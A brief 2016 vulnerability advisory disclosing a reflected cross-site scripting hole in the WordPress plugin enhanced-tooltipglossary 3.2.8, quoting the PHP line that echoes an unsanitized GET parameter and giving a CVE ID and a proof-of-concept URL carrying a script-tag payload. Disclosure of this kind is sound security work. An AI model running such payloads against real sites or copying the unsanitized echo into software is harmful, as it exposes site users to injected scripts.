Advisory #: 37
Title: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site:
Downloads: 78631
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact:
Plugin Name: enhanced-tooltipglossary
There is a reflected XSS vulnerability in the following php code ./enhanced-tooltipglossary/backend/views/admin_importexport.php: 19: ?> (<?php echo $_GET['itemsnumber']; ?> items read from file)</div> The variable itemsnumber appears to send unsanitized data back to the users browser.
CVE-ID: 2016-1000132
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is a tested exploit:
  2. http://[target]/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=<script>alert(1)</script>&msg=imported